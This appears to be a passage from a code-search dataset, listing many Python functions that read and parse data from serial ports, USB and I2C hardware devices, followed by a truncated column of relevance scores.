"def reader(self):\n try:\n line = ''\n while self.alive:\n data = self.serial.read(1)\n if data == '\\r':\n continue\n\n line += data\n if data == '\\n':\n self.log.print_distant(datetime.now().strftime(\n \"%d/%m/%Y %H:%M:%S> \"))\n if line.startswith('ALARM:'):\n self.log.alert(line)\n elif line.startswith('EVENT:') or line.startswith('INFO'):\n self.log.warn(line)\n else:\n self.log.print_distant(line)\n self.parse(line.strip())\n line = ''\n\n sys.stdout.flush()\n\n except serial.SerialException:\n self.alive = False\n # would be nice if the console reader could be interruptted at this\n # point...\n raise",
"def receive (self):\r\n\t\t# Ensure serial port is open\r\n\t\tif not self.serial_port.is_open:\r\n\t\t\tself.serial_port.open()\r\n\t\t\r\n\t\t# Read from port\r\n\t\tlines = []\r\n\t\terrs = []\r\n\t\t\r\n\t\t# Check if there's anything in the input buffer\r\n\t\twhile self.serial_port.in_waiting > 0:\r\n\t\t\t# Get a line from the receive buffer\r\n\t\t\trcv = self.serial_port.readline()\r\n\t\t\ttry:\r\n\t\t\t\tline = str(rcv.decode('ascii'))\r\n\t\t\texcept UnicodeDecodeError as e:\r\n\t\t\t\traise RuntimeError(\"unexpected characters in Qontroller return value. Received line '{:}'.\".format(rcv) )\r\n\t\t\t\r\n\t\t\t# Check if it's an error by parsing it\r\n\t\t\terr = self.parse_error(line)\r\n\t\t\tif err is None:\r\n\t\t\t\t# No error, keep the line\r\n\t\t\t\tlines.append(line)\r\n\t\t\telse:\r\n\t\t\t\t# Line represents an error, add to list\r\n\t\t\t\terrs.append(err)\r\n\t\t\r\n\t\t# Log the lines we received\r\n\t\tif len(lines):\r\n\t\t\tself.log_append(type='rcv', id='', ch='', desc=lines, raw='')\r\n\t\t\r\n\t\t# Add any errors we found to our log\r\n\t\tfor err in errs:\r\n\t\t\tself.log_append(type='err', id=err['id'], ch=err['ch'], desc=err['desc'], raw=err['raw'])\r\n\t\t\r\n\t\treturn (lines, errs)",
"def __reader(self):\n empty = bytes()\n\n try:\n while not self._wantExit:\n # logging.debug(\"reading character\")\n b = self._readBytes(1)\n # logging.debug(\"In reader loop\")\n if len(b) > 0:\n # logging.debug(f\"read returned {b}\")\n c = b[0]\n ptr = len(self._rxBuf)\n\n # Assume we want to append this byte, fixme use bytearray instead\n self._rxBuf = self._rxBuf + b\n\n if ptr == 0: # looking for START1\n if c != START1:\n self._rxBuf = empty # failed to find start\n if self.debugOut != None:\n try:\n self.debugOut.write(b.decode(\"utf-8\"))\n except:\n self.debugOut.write('?')\n\n elif ptr == 1: # looking for START2\n if c != START2:\n self._rxBuf = empty # failed to find start2\n elif ptr >= HEADER_LEN: # we've at least got a header\n # big endian length follos header\n packetlen = (self._rxBuf[2] << 8) + self._rxBuf[3]\n\n if ptr == HEADER_LEN: # we _just_ finished reading the header, validate length\n if packetlen > MAX_TO_FROM_RADIO_SIZE:\n self._rxBuf = empty # length ws out out bounds, restart\n\n if len(self._rxBuf) != 0 and ptr + 1 == packetlen + HEADER_LEN:\n try:\n self._handleFromRadio(self._rxBuf[HEADER_LEN:])\n except Exception as ex:\n logging.error(\n f\"Error while handling message from radio {ex}\")\n traceback.print_exc()\n self._rxBuf = empty\n else:\n # logging.debug(f\"timeout\")\n pass\n except serial.SerialException as ex:\n if not self._wantExit: # We might intentionally get an exception during shutdown\n logging.warn(f\"Meshtastic serial port disconnected, disconnecting... {ex}\")\n except OSError as ex:\n if not self._wantExit: # We might intentionally get an exception during shutdown\n logging.error(f\"Unexpected OSError, terminating meshtastic reader... {ex}\") \n except Exception as ex:\n logging.error(f\"Unexpected exception, terminating meshtastic reader... {ex}\")\n finally:\n logging.debug(\"reader is exiting\")\n self._disconnected()",
"def read(self) -> bytes:\n line = self.device.readline()\n if len(line) > 0 and line[-1] == 10:\n line += self.device.readline()\n return line",
"def ReadSerial():\n return _ReadNumericFile(pathutils.JOB_QUEUE_SERIAL_FILE)",
"def read_data(self):\n raise NotImplementedError",
"def read(self, count):\n # TIMEOUT: Since read is called in a loop, wait for self.timeout period before\n # calling serial.read(). See comment on serial.Serial() call above about\n # timeout.\n time.sleep(self.read_timeout)\n c = str()\n try:\n if self.serial:\n c = self.serial.read(count)\n except SerialException as e:\n self.serial = None\n self.LAST_ERROR = \"connection lost, serial.read(%d): %s\" % (count, str(e))\n self.logger.prn_err(str(e))\n return c",
"def getData(self):\n self.ser.write(b'g')\n readString = self.ser.readline()\n print(readString)\n readString = readString.decode(\"utf-8\")\n splittedString = readString.split('\\t')\n for i, num in enumerate(splittedString):\n try:\n splittedString[i] = int(float(num))\n except ValueError:\n pass\n self.accString.set('Accleration\\nX: %.5f\\nY: %.5f\\nZ: %.5f' %\n (splittedString[0], splittedString[1],\n splittedString[2]))\n self.logFile.write(readString)\n self.comJob = root.after(10, self.getData)",
"def read_drt(self):\n data = Array('B')\n data = self.read(0, 0, 8)\n num_of_devices = drt_controller.get_number_of_devices(data)\n len_to_read = num_of_devices * 8\n\n data = self.read(0, 0, len_to_read + 8)\n self.drt_manager.set_drt(data)",
"def getUARTFrameReady():\r\n serialRead()\r\n serialRead()",
"def read(self, delay, cmd):\n \n buf = []\n seeking_sync = True;\n seeking_end = True;\n\n time.sleep(delay)\n # Read serial into buffer and then pop out to s for return\n while self.ser.inWaiting() > 0:\n ch = self.ser.read(1) #Read 1 BYTE\n \n if seeking_sync:\n if ch == chr(2): # <STX>\n seeking_sync = False\n elif seeking_end:\n if ch == chr(6): # <ACK>\n buf.append(chr(6))\n seeking_end = False\n else:\n buf.append(ch)\n \n ### These checks should be moved to send like the other serial classes\n if not buf: # No reply received\n debugRow = 'arduinoSerial:: Sent_Cmd: ' + cmd + ' No reply!'\n self.dbF.writerow([debugRow])\n if DEBUG: print debugRow\n return False\n elif buf[-1] != chr(6): # Check for ACK character\n debugRow = 'arduinoSerial:: Sent_Cmd: ' + cmd + ' ACK not found!'\n self.dbF.writerow([debugRow])\n if DEBUG: print debugRow\n return False \n else:\n cmd = buf[0] # First entry is command\n # Comma separated data stored in list\n data = ''.join(buf[1:-1]).split(',') \n return cmd, data",
"def receive_command(self):\n if self.serial.is_open:\n return self.serial.read(999).decode('utf-8')\n self.serial.flush()",
"def serial_handler(self):\n hdr = self.serial.read(2)\n if hdr is None:\n print('tried to handle empty serial message queue')\n elif len(hdr) == 2 and hdr[1] == int('fc', 16):\n rx = self.serial.read(6)\n (u, c, d) = self.pkt.unpack(rx)\n #write the data to file here\n self.f.write(\"{0}\\t{1}\\t{2}\\n\".format(u, c, d))\n elif len(hdr) == 2 and hdr[1] == int('fd', 16):\n print('rx heartbeat message')\n else:\n print(\"unknown header: {0}\".format(hdr))\n self.serial.flushInput()\n # msg = self.serial.read(8)\n # self.f.write(\"{0}\\t{1}\\t{2}\\t{3}\\n\".format(*self.pkt.unpack(msg)))",
"def request_arduino_data(self):\n\n # Send a command to request arduino data\n with self.lock:\n self.ser.write(self.ARD_RETURNALL)",
"def readData(self):\n self._readHeader()\n self._readSize()\n self._readComments()\n self._readAllROI()\n self._readDate()\n self._readArray()",
"def ll_uart_read(self,length):\r\n data=''\r\n time_begin = time.time()\r\n while True:\r\n #time_cnt = time.time() - time_begin\r\n # if int(time_cnt) >= self._ll_rx_timeout:\r\n # print(time_cnt)\r\n # print(len(data))\r\n # return ''\r\n \r\n if not self._uart_rx_queue.empty():\r\n #with self._rx_lock:\r\n data += self._uart_rx_queue.get(1)\r\n #self.log.debug(\"[RECV]:\"+ str(data))\r\n else:\r\n # time.sleep(0.01)\r\n # time_cnt = time_cnt + 0.01\r\n pass\r\n\r\n if len(data) == length:\r\n print(time.time()-time_begin)\r\n return data",
"def _readline(self):\n return self.ser.readline().decode(\"ASCII\").strip()",
"def read_serial(self, num_expected):\n\n\t\ttotal_received = 0\n\t\tread_chars = \"\"\t\n\t\n\t\twhile total_received < num_expected:\n\t\t\tiw = self.ser.inWaiting()\n\n\t\t\tif iw > num_expected:\n\t\t\t\tiw = num_expected\n\t\t\tread_chars = read_chars + self.ser.read(iw)\n\t\t\ttotal_received += iw\n\t\t\ttime.sleep(0.001)\n\t\treturn read_chars",
"def readCommand(self):\n while (True):\n time.sleep(1)\n # At least a package of 4 bytes (minimum)\n # [ Head | Length | Address | Data[0…N] | Check ]\n if (self._serial.inWaiting()>=4):\n # Gets only the first byte of the packet (it should be HEAD)\n packet_header = self._serial.read(1)\n if (packet_header != Ind903Packet.PACKET_HEAD):\n # the next one is the length of the packet\n packet_length_bytes = self._serial.read(1)\n packet_length = int.from_bytes(packet_length_bytes, byteorder='big')\n if (packet_length > 0):\n raw_packet = b\"\".join([packet_header, packet_length_bytes, self._serial.read(packet_length)]) \n result_packet = Ind903Packet.parsePacket(raw_packet)\n return (result_packet)",
"def read(self, delay):\n \n buf = []\n seeking_sync = True;\n seeking_end = True;\n \n time.sleep(delay)\n # Read serial into buffer and then pop out to s for return\n while self.ser.inWaiting() > 0:\n ch = self.ser.read(1) #Read 1 BYTE\n\n if seeking_sync:\n if ch == self.stx: # <STX>\n seeking_sync = False\n elif seeking_end:\n if ch == self.ack: # <ACK>\n buf.append(self.ack)\n seeking_end = False\n else:\n buf.append(ch)\n \n \n if not buf: # No reply received\n return False\n elif buf[-1] != self.ack: # Check for ACK character\n return False \n else:\n return ''.join(buf[:-1])",
"def serial_read(user_gpio):\n bytes = _u2i(_pigpio_command(_control, _PI_CMD_SLR, user_gpio, 10000))\n if bytes > 0:\n buf = \"\"\n while len(buf) < bytes: buf += _control.recv(bytes-len(buf))\n return bytes, buf\n return bytes, \"\"",
"def read():\n # TODO",
"def readSerial():\n global emergState\n global responseQueue\n global emergSem\n global serSem\n global respSem\n \n while True:\n emergSem.acquire()\n temp = emergState\n emergSem.release()\n if not temp:\n respSem.acquire()\n temp = responseQueue\n respSem.release()\n if len(temp) > 0:\n string = temp[0]\n temp = temp[1:]\n return string\n else:\n return False\n time.sleep(0.2)\n return False",
"def _read_cardiochip(self):\n cur_leadstatus = 0\n sample_count =0\n while self.connected:\n sample_count+=1\n #check for sync bytes\n readbyte = ord(self.ser.read(1))\n #print readbyte, SYNC_BYTE\n if readbyte != SYNC_BYTE:\n continue\n readbyte = ord(self.ser.read(1))\n if readbyte != SYNC_BYTE:\n continue\n\n #parse length byte\n while True:\n pLength = ord(self.ser.read(1))\n if pLength != SYNC_BYTE:\n break\n if pLength > 169:\n continue\n #print \"L: %i\" % pLength\n\n # collect payload bytes\n payload = self.ser.read(pLength)\n payload = [ord(x) for x in payload] #convert to int from string\n #print \"payload: \" + str(payload).strip('[]')\n # ones complement inverse of 8-bit payload sum\n checksum = sum(payload) & 0xFF\n checksum = ~checksum & 0xFF\n\n # catch and verify checksum byte\n chk = ord(self.ser.read(1))\n #print \"chk: \" + str(checksum)\n if chk != checksum:\n print \"checksum error, %i != %i\" % (chk, checksum)\n continue\n\n output = self._parseData(payload)\n\n lead_status = next(( d for d in output if 'leadoff' in d), None)\n if lead_status is not None:\n if cur_leadstatus != lead_status['leadoff']:\n #we have a change\n if lead_status['leadoff']==200:\n print \"LEAD ON\"\n elif lead_status['leadoff']==0:\n print \"LEAD OFF\"\n cur_leadstatus = lead_status['leadoff']\n\n # store the output data in a queue\n # first, create a tuple with the sample index and dict with the timestamp and ecg\n ecgdict = next(((i,d) for i,d in enumerate(output) if 'ecg_raw' in d), None)\n if ecgdict is not None and sample_count>self.Fs*2:\n #let's just ignore the first 2 seconds of crappy data\n ecgdict[1]['leadoff'] = cur_leadstatus\n #print ecgdict[1]\n self.ecg_buffer.put(ecgdict[1]) # this should save the ecg and timestamp keys\n\n return",
"def async_read(self):\n self.lock.acquire()\n\n # append data\n self.rx_buffer += self.interface.read()\n\n # ensure first byte start with 0xbc\n if len(self.rx_buffer) > 0:\n if self.rx_buffer[0] != 0xbc:\n try:\n pkt_start = self.rx_buffer.index(0xbc)\n self.rx_buffer = self.rx_buffer[pkt_start:]\n except ValueError:\n self.rx_buffer = bytes()\n\n # check if we got a valid packet\n if len(self.rx_buffer) >= 4:\n pkt_size = unpack('<H', self.rx_buffer[2:4])[0]\n # check if we got a complete packet\n if len(self.rx_buffer) >= (pkt_size + 5):\n # yep, parse this packet\n packet = Packet.fromBytes(self.rx_buffer[:pkt_size+5])\n self.rx_buffer = self.rx_buffer[pkt_size+5:]\n self.lock.release()\n return packet\n\n # otherwise, return None\n self.lock.release()\n return None",
"def _receive(self, length):\n \n return self.device.read(length)",
"def read_data(self, size, attempts = 1):\n data = Array('B')\n # do we have all of the data in the read buffer?\n if size <= len(self.rdbuf) - self.rdofs:\n data = self.rdbuf[self.rdofs : self.rdofs + size]\n self.rdofs += size\n return data\n # do we have some of the data in the read buffer?\n if len(self.rdbuf) - self.rdofs > 0:\n data = self.rdbuf[self.rdofs:]\n # do a usb read to get the rest...\n # read from the usb device\n try:\n bytes_to_rd = size - len(data)\n while bytes_to_rd > 0:\n # read from the usb device\n while True:\n self.rdbuf = self._read()\n self.rdofs = 0\n if len(self.rdbuf) > 0:\n break\n else:\n # no data received\n attempts -= 1\n if attempts > 0:\n # try again\n continue\n # return what we have\n return data\n # copy the read buffer into the returned data\n n = len(self.rdbuf)\n if n >= bytes_to_rd:\n # copy a partial read buffer\n data += self.rdbuf[:bytes_to_rd]\n self.rdofs = bytes_to_rd\n return data\n else:\n # copy all of the read buffer\n data += self.rdbuf\n bytes_to_rd -= n\n # read more data...\n except usb.core.USBError as e:\n raise usbdev_error(str(e))\n # never reached\n raise usbdev_error(\"internal error\")",
"def read(self,count=None, ser = None):\n from time import time\n ##debug(\"read count=%r,ser=%r\" % (count,ser))\n if ser is None:\n ser = self.ser\n if ser is not None:\n #print(\"in wait:\" + str(self.ser.inWaiting()))\n debug(\"Trying to read %r bytes from %s...\" % (count,ser.name))\n ser.timeout = self.timeout\n reply = ser.read(count)\n debug(\"%s: Read %r\" % (ser.name,reply))\n self.last_reply_time = time()\n else: reply = \"\"\n return reply",
"def _reader(self):\n while self._alive:\n self._paused = False\n if self._interface:\n self._interface.serial_resumed()\n time.sleep(4)\n self._paused = True\n if self._interface:\n self._interface.serial_paused()\n time.sleep(2)",
"def __recv__(self):\n data = self.port.read(size=1)\n v = int.from_bytes(data, byteorder=\"little\")\n if(self.verbose):\n pc.color_stdout(\"RED\")\n print(\"<< %s\\t - %s\\t - %d\"% (hex(v),bin(v),v))\n pc.color_stdout(\"RESET\")\n return data",
"def dataReceived( self, data ):\n # if self.log.isEnabledFor(logging.DEBUG):\n # self.log.debug(\"Received data [%s]\" % _safelylogOutPdu(data))\n \n self.recvBuffer = self.recvBuffer + data\n \n while True:\n if self.connectionCorrupted:\n return\n msg = self.readMessage()\n if msg is None:\n break\n self.endPDURead()\n self.rawMessageReceived(msg)\n \n if len(self.recvBuffer) > 0:\n self.incompletePDURead()",
"def get_data(self):\n try:\n data_string = self.ser.readline().decode()\n except UnicodeDecodeError as e:\n return self.get_data()\n \n if not data_string: # check for empty string\n return self.get_data()\n \n if data_string[0] == '|' and data_string[-1] == '\\n' and\\\n self.reset_confirmed:\n # if the data_string is valid, process it\n try:\n data_string = data_string.strip() \n data = data_string.split(',')\n assert len(data) == 7, \"Bad data Length\" \n data = [float(val) for val in data[1:]]\n data[0] /= 1000\n if self.ser.in_waiting: self.ser.reset_input_buffer()\n return data\n except (AssertionError, ValueError) as e:\n print(\"Error:\", type(e), e)\n if self.ser.in_waiting: self.ser.reset_input_buffer()\n return self.get_data()\n\n\n elif data_string[0] == '+' and data_string[-1] == '\\n' and\\\n self.reset_confirmed:\n # if the data_string is a valid time stamp, process it\n # self.system_timestamp = \"\\nSystem start time is: \"\\\n # \"%s\" % strftime(\"%Y/%m/%d %H:%M:%S\", localtime())\n self.arduino_timestamp = data_string.strip()\n print(self.arduino_timestamp)\n return self.get_data()\n \n elif data_string[0] == '/' and data_string[-1] == '\\n':\n # if string begins with / then it is a debug message and should\n # just be returned\n if \"setup finished\" in data_string.lower(): \n self.reset_confirmed = True\n print(data_string.strip())\n return self.get_data()\n else:\n # if the data_string is invalid try again\n return self.get_data()",
"def read(self, n=1):\n s = self._RX_buf[0:n]\n self._RX_buf = self._RX_buf[n:]\n # print(\"read op occurred: RX_buf = {}\".format(self._RX_buf), end='\\n\\n')\n return s # bytes(s, encoding='ascii')",
"def servo_read_all(self):\n msg = b'\\x25\\x00'\n parameter_len = 16\n ans = self.__bt.read(msg, parameter_len)\n if ans is not None:\n return [x for x in ans]\n return None",
"def pub_serial_read():\n pub = rospy.Publisher('serial_reader', String, queue_size=10)\n while not rospy.is_shutdown():\n recv=serial_read(useParse=True)\n if recv != '':\n rospy.loginfo(recv)\n pub.publish(recv)\n else:\n pass\n print 'Closing...'",
"def serial_read(self, size):\n line=''\n # How many chars in the buffer\n actualsize = len(self.buffer)\n # maximal the avialable chars\n if size > actualsize:\n size = actualsize\n linebuf = self.buffer[:size]\n self.buffer = self.buffer[size:]\n for c in linebuf:\n line += chr(c)\n return line",
"def get_data(self):\n return read_sensor(bus=self.bus,\n address=self.address)",
"def read_live_data(wearable_port):\r\n IMU1_num = []\r\n IMU2_num = []\r\n IMU3_num = []\r\n\r\n try:\r\n wearable = serial.Serial(wearable_port, baudrate=115200, timeout=5)\r\n #arduino = serial.Serial(arduino_port, timeout=1)\r\n # Delay for 2 seconds to wait for serial port to be ready.\r\n print(\"Waiting 2 seconds for serial to be ready.\")\r\n time.sleep(2)\r\n except Exception as e:\r\n print(e)\r\n print('Please check the port')\r\n return\r\n\r\n input(\"Press Enter to continue...\")\r\n str(wearable.write(bytes(33)))\r\n # Open file to store the data; filename includes date and time; format: data-YYYYMMDDHHmmss.csv\r\n filename = \"data-\" + str(dt.datetime.now().strftime(\"%Y%m%d%H%M%S\")) + \".csv\"\r\n filenamplot = \"plot-\" + str(dt.datetime.now().strftime(\"%Y%m%d%H%M%S\")) + \".png\"\r\n print(\"Opening %s\" % filename)\r\n f = open(filename, \"a+\")\r\n # f.write(\"power,rpm\\n\")\r\n count = 1000\r\n # Get data and continuously yield Power and RPM as integers\r\n\r\n while (count >0):\r\n count = count -1\r\n #if arduino.in_waiting > 0:\r\n wearable.flushInput()\r\n\r\n '''\r\n arduino_output = arduino.readline().decode(\"utf_8\", \"strict\")\r\n print(\"Distance: %s\" % arduino_output)\r\n f.writelines(\"%s\" % arduino_output)\r\n if arduino_output == \"Hard Stop\\r\\n\":\r\n break\r\n arduino_output = arduino_output.replace(\"\\r\\n\", \"\")\r\n Distance.append(int(float(arduino_output)))\r\n '''\r\n\r\n try:\r\n data = wearable.readline().decode(\"utf_8\", \"strict\")\r\n data = data.replace(\"\\r\\n\", \"\\n\").split()\r\n IMU1= data[2].replace(\"\\n\", \"\")\r\n IMU1_num.append(int(IMU1))\r\n IMU2 = data[3].replace(\"\\n\", \"\")\r\n IMU2_num.append(int(IMU2))\r\n IMU3 = data[4].replace(\"\\n\", \"\")\r\n IMU3_num.append(int(IMU3))\r\n print(\"IMU1: %s\\t IMU2: %s\\t IMU3: %s\\t\" % (IMU1, IMU2, IMU3))\r\n f.writelines(\"%s,%s,%s,%s\\n\" % (IMU1, IMU2, IMU3))\r\n yield int(IMU1), int(IMU2), int(IMU3)\r\n except Exception as e:\r\n print('error')\r\n f.writelines(\"Error\\n\")\r\n\r\n print('Program ended.')\r\n t = numpy.linspace(1, len(IMU1_num), len(IMU1_num))\r\n fig, (ax1) = plt.subplots(nrows=1, ncols=1, figsize=(16.0, 9.0)) # create figure & 1 axis\r\n ax1.plot(t, IMU1_num, t, IMU2_num,t, IMU3_num)\r\n ax1.set_title('IMU')\r\n ax1.legend(('IMU1', 'IMU2', 'IMU3'))\r\n # manager = plt.get_current_fig_manager()\r\n # manager.resize(*manager.window.maxsize())\r\n fig.savefig(filenamplot)\r\n plt.show()\r\n\r\n f.close()\r\n #arduino.close()\r\n wearable.close()",
"def get_readings(self):\n buf = self._read(0x020001)\n data = decode(buf[1:])\n return data",
"def _readline(self):\n\n eol = b'\\r'\n leneol = len(eol)\n line = bytearray()\n while True:\n c = self.ser.read(1)\n if c:\n line += c\n if line[-leneol:] == eol:\n break\n else:\n break\n return bytes(line)",
"def _read(self, register):\n\n addr, num_bytes = register\n data = response = error = None\n if num_bytes == 1:\n data, response, error = self.packet_handler.read1ByteTxRx(\n self.port_handler, self._id, addr\n )\n elif num_bytes == 2:\n data, response, error = self.packet_handler.read2ByteTxRx(\n self.port_handler, self._id, addr\n )\n else:\n data, response, error = self.packet_handler.read4ByteTxRx(\n self.port_handler, self._id, addr\n )\n\n # Check response\n self._error_handler(response, error)\n\n return data",
"def _read(self):\n # because protocol has no termination chars the read reads the number\n # of bytes in the buffer\n bytes_in_buffer = self.visa_handle.bytes_in_buffer\n # a workaround for a timeout error in the pyvsia read_raw() function\n with(self.visa_handle.ignore_warning(visa.constants.VI_SUCCESS_MAX_CNT)):\n mes = self.visa_handle.visalib.read(\n self.visa_handle.session, bytes_in_buffer)\n mes = str(mes[0].decode()) # cannot be done on same line for some reason\n # if mes[1] != 0:\n # # see protocol descriptor for error codes\n # raise Exception('IVVI rack exception \"%s\"' % mes[1])\n return mes",
"def readAndRespond(self):\n\n if self.ser.isOpen():\n try:\n #Try to read\n self.ser.flushOutput()\n response = self.ser.readline()\n self.parseString(response)\n print response\n #if response.strip() == \"up\":\n # self.moveArmUp()\n # print \"Moving Up!\"\n #elif response.strip() == \"down\":\n # self.moveArmDown()\n # print \"Moving Down!\"\n except Exception, e:\n print \"Error: \" + str(e)",
"def __recv(self):\n in_buffer = \"\"\n self.__ser.reset_input_buffer()\n while True:\n data_in = self.__ser.read(64)\n if not in_buffer and not data_in:\n time.sleep(0.1)\n continue\n if self.__debug:\n print \"<<< %s\" % binascii.hexlify(data_in)\n in_buffer += data_in\n if len(in_buffer) < 6:\n continue\n msg_id, param1, param2, dst, src = struct.unpack(\"<HBBBB\", in_buffer[0:6])\n msg_len = 6\n if dst | 0x80:\n # Packet is long format\n dst &= 0x7F\n msg_len += ((param2 << 8) | param1)\n # Check this message is from the controller and for us\n if dst != self.__src or src != self.__dst:\n in_buffer = \"\"\n continue\n if len(in_buffer) < msg_len:\n # Message is incomplete\n continue\n # Now look for messages we recognise\n if msg_id == self.MGMSG_MOT_GET_STATUSUPDATE:\n self.__decode_status(in_buffer[6:msg_len])\n in_buffer = in_buffer[msg_len:]\n continue\n elif msg_id == self.MGMSG_MOT_MOVE_COMPLETED:\n in_buffer = in_buffer[msg_len:]\n continue\n elif msg_id == self.MGMSG_MOT_MOVE_HOMED:\n in_buffer = in_buffer[msg_len:]\n continue\n # If we got here, the message was invalid\n # Clear the buffer to resynchronise\n in_buffer = \"\"\n continue",
"def data_received(self, data):\n for byte in serial.iterbytes(data):\n if self.in_data and (len(self.packet) < self.data_size):\n self.packet.extend(byte)\n if len(self.packet) == self.data_size:\n self.in_data = False\n # make read-only copy\n self.handle_packet(bytes(self.packet))\n del self.packet[:]\n # Since there is no 'byte' object, indexing a bytes or bytearray\n # object yields an int. Instead, we need to compare a bytes object\n # of size 1 with a bytes object of size 1\n elif byte == self.HEADER[self.header_pos:self.header_pos+1]:\n self.header_pos += 1\n if self.header_pos == len(self.HEADER):\n self.header_pos = 0\n self.in_data = True\n else:\n self.header_pos = 0",
"def read_data(self):\r\n\t\tdata0 = bus.read_byte(A1332_DEFAULT_ADDRESS)\r\n\t\tdata1 = bus.read_byte(A1332_DEFAULT_ADDRESS)\r\n\t\t\r\n\t\ttime.sleep(0.5)\r\n\t\t\r\n\t\t# Checking valid data\r\n\t\twhile (data0 == 0) and (data1 == 0) :\r\n\t\t\tdata0 = bus.read_byte(A1332_DEFAULT_ADDRESS)\r\n\t\t\tdata1 = bus.read_byte(A1332_DEFAULT_ADDRESS)\r\n\t\t\r\n\t\t# Convert the data to 12-bits\r\n\t\traw_adc = ((data0 & 0x0F) * 256.0) + data1\r\n\t\tangle = (raw_adc / 4096.0) * 360.0\r\n\t\t\r\n\t\treturn {'a' : angle}",
"def _read_packet(self, packet_id, data_bytes):\n self._serial_conn.send_command(_SENSORS_OPCODE+\" \"+str(packet_id))\n return self._serial_conn.read_data(data_bytes)",
"def serial_read_open(user_gpio, baud):\n return _u2i(_pigpio_command(_control, _PI_CMD_SLRO, user_gpio, baud))",
"def read_arduino_data_and_format_dictionary(self):\n\n # Use a thread to issue command to the serial port\n Worker(self.request_arduino_data)\n\n # Use another thread to receive all of the serial data\n arduino_lines = self.return_serial_lines()\n\n if arduino_lines:\n for line in arduino_lines:\n self.arduinoLineToDictionary(line)",
"def on_timer(self):\n self.read_serial_data()\n # self.update_monitor()",
"def read(self, bytes_to_receive=512, **kwargs):\n who_send = kwargs.get(\"who_send\", None)\n data = None\n if(self._type_connection == \"COM\"):\n data = self._connection.read(bytes_to_receive)\n else:\n msg = \"99, Error al recibir por la conexion {}\".format(self._type_connection)\n raise ValueError(msg)\n\n transa_log(data, is_hexa_data=True, who_send=who_send)\n return data",
"def read(self):\n try:\n cmd = 'SAMP:COUN 1' \n self.handle.write(cmd) #one sample per trigger\n self.handle.write('TRIG:SOUR BUS') #triggered by command\n self.handle.write('TRIG:COUN 1') #one trigger to return to wait for trg\n self.handle.write('INIT:IMM') #DVM to \"wait for trigger\" \n self.handle.write('*TRG')\n startTime = time.time()\n while True: #wait until measuring flag goes to 0\n try:\n measured = self.handle.ask(\"DATA:POIN?\")\n measured = measured.strip() #remove CR \n measured = int(measured) #convert to number\n if measured == 1: #final number of samples achieved\n break;\n except Exception:\n print('Dvm34411:read() polling failed !')\n raise\n \n if time.time() - startTime > self.timeout:\n print('Dvm34411:read() timeout !')\n return False\n \n time.sleep(1) \n reading = self.handle.ask('R? 1;') #definite-Length block format\n except Exception:\n print('Dvm34411.read() failed !')\n raise\n if reading[0] != '#':\n print('Dvm34411.read() DLB format error - # expected !')\n return False\n digits = int(reading[1])\n reading = reading[2 + digits:]\n rdg = float(reading)\n return rdg",
"def callback_dat(fd_):\n # receive data\n data = os.read(fd_, 8)\n if data == '':\n return\n data, = struct.unpack('<Q', data)\n # TODO: Interpret data",
"def _readData(self):\n # Debug. This fn should be called only after checking canRead()\n if not self._canRead():\n raise Exception(\"Trying to read more data than there is.\")\n\n data = self.buffer[:self._expectedByteCount]\n self.buffer = self.buffer[self._expectedByteCount:]\n\n return data",
"def Read_Byte(self):\r\n data = self.Port.read(1)\r\n return data",
"def _get_data(self, read_size):\n if NIX:\n return super(Keyboard, self)._get_data(read_size)\n return self._pipe.recv_bytes()",
"def __init__(self, port, baud=9600):\n self.ser = serial.Serial(port, baud)\n self.ser.reset_input_buffer()\n self.info = str(self.ser.readline())[2:-5].split(',')",
"def get_data(self):\n self.dev.write(1, 'A0')\n digit1, digit2 = self.dev.read(0x81, 64)[:2]\n # Save the data as voltage between 0.0 and 5.0\n self.data0.append((digit1 + 256*digit2)*5.0/1024)",
"def Serial(self):\n ret,buf= self.Bus.Transaction(chr(self.Address+1)+chr(Serial),0x06)\n return struct.unpack(\">L\", buf[2:6])[0]",
"def open_serial(self):\n self.port = serial.Serial(\n self.device,\n baudrate=SERIAL_BAUD,\n timeout=5.0,\n bytesize=serial.EIGHTBITS,\n parity=serial.PARITY_NONE,\n stopbits=serial.STOPBITS_ONE,\n xonxoff=False,\n rtscts=False,\n dsrdtr=False)\n\t\n self.port.flushInput()\n self.port.flushOutput()",
"def read(self):\n self._read_into_buffer()\n # print([hex(i) for i in self._buffer])\n\n # check packet header\n if not self._buffer[0:2] == b\"BM\":\n raise RuntimeError(\"Invalid PM2.5 header\")\n\n # check frame length\n frame_len = struct.unpack(\">H\", self._buffer[2:4])[0]\n if frame_len != 28:\n raise RuntimeError(\"Invalid PM2.5 frame length\")\n\n checksum = struct.unpack(\">H\", self._buffer[30:32])[0]\n check = sum(self._buffer[0:30])\n if check != checksum:\n raise RuntimeError(\"Invalid PM2.5 checksum\")\n\n # unpack data\n (\n self.aqi_reading[\"pm10 standard\"],\n self.aqi_reading[\"pm25 standard\"],\n self.aqi_reading[\"pm100 standard\"],\n self.aqi_reading[\"pm10 env\"],\n self.aqi_reading[\"pm25 env\"],\n self.aqi_reading[\"pm100 env\"],\n self.aqi_reading[\"particles 03um\"],\n self.aqi_reading[\"particles 05um\"],\n self.aqi_reading[\"particles 10um\"],\n self.aqi_reading[\"particles 25um\"],\n self.aqi_reading[\"particles 50um\"],\n self.aqi_reading[\"particles 100um\"],\n ) = struct.unpack(\">HHHHHHHHHHHH\", self._buffer[4:28])\n\n return self.aqi_reading",
"def get_data(N,port_name,port_speed):\r\n t = np.zeros(N) # array for timestamps \r\n percent = np.zeros(N) # array for percentage values\r\n \r\n # get data from serial port\r\n with serial.Serial(port=port_name,baudrate=port_speed,timeout=2) as myport:\r\n \r\n sleep(2) # allow arduino to reset itself\r\n \r\n while (get_valid_line(myport) != 'START'):\r\n pass # wait until start tag is received\r\n \r\n # retrieve data\r\n for i in range(N):\r\n \r\n line = get_valid_line(myport) # check for valid line\r\n \r\n if line == 'START': # ignore any subsequent tags\r\n line = myport.readline()\r\n \r\n stamp, val = [int(a) for a in line.split()] # seperate data\r\n t[i] = stamp/1e3 # convert to seconds\r\n percent[i] = (val/1023)*100 # convert to percentage of max \r\n \r\n return t,percent",
"def Read(self):\n if not self._mem: return self.data\n\n logger.info(\"Read %s\" % self)\n self.data = self.hostmemmgr.read(self._mem, self.size)\n\n logger.info(\"=\" * 30, \"READ BUFFER\", \"=\" * 30)\n scapyfactory.Parse(self.data).Show()\n logger.info(\"=\" * 30, \"END READ BUFFER\", \"=\" * 30)\n\n return self.data"
] | [
"0.74985415",
"0.7416476",
"0.7264147",
"0.71994764",
"0.7146726",
"0.71219176",
"0.70422417",
"0.68189454",
"0.67572755",
"0.6739092",
"0.6716637",
"0.667686",
"0.6584695",
"0.6572481",
